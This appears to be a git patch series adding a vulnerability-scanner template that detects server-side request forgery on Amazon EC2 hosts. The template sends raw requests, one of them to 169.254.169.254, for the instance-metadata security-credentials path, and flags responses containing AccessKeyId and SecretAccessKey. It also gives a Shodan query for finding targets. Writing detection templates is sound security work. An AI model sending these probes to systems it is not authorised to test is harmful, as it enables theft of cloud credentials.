From 6b45d0be7a8894b55d63b539eb07e20a1395e829 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Dec 2022 19:53:30 +0530 Subject: [PATCH 1/4] Create amazon-ec2-ssrf.yaml --- vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 28 +++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/amazon/amazon-ec2-ssrf.yaml diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml new file mode 100644 index 0000000000..159802e3de --- /dev/null +++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -0,0 +1,28 @@ +id: amazon-ec2-ssrf +info: + name: Amazon EC2 SSRF + author: DhiyaneshDk + severity: critical + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-441 + metadata: + verified: "true" + shodan-query: "Server: EC2ws" + tags: aws,ec2,ssrf,amazon + +requests: + - raw: + - |+ + GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers: + - type: word + part: body + words: + - "AccessKeyId" + - "SecretAccessKey" + condition: and From dece342c2109b39db19f2e513cc1a12d11e6b1c8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Dec 2022 22:23:05 +0530 Subject: [PATCH 2/4] Update amazon-ec2-ssrf.yaml --- vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml index 159802e3de..3c769f6ce8 100644 --- a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml +++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -1,4 +1,5 @@ id: amazon-ec2-ssrf + info: name: Amazon EC2 SSRF author: DhiyaneshDk @@ -8,7 +9,6 @@ info: cvss-score: 9.3 cwe-id: CWE-441 metadata: - verified: "true" shodan-query: "Server: EC2ws" tags: aws,ec2,ssrf,amazon @@ -18,7 +18,13 @@ requests: GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 Host: {{Hostname}} + - |+ + GET http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true unsafe: true + matchers-condition: and matchers: - type: word part: body @@ -26,3 +32,7 @@ requests: - "AccessKeyId" - "SecretAccessKey" condition: and + + - type: status + status: + - 200 From cacf0ef565bad8c4dcf33f7534872874b52db682 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 11:03:37 +0530 Subject: [PATCH 3/4] Update amazon-ec2-ssrf.yaml --- vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml index 3c769f6ce8..43f0522be6 100644 --- a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml +++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -1,7 +1,7 @@ id: amazon-ec2-ssrf info: - name: Amazon EC2 SSRF + name: Amazon EC2 - Server-side request forgery (SSRF) author: DhiyaneshDk severity: critical classification: @@ -9,6 +9,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 metadata: + verified: true shodan-query: "Server: EC2ws" tags: aws,ec2,ssrf,amazon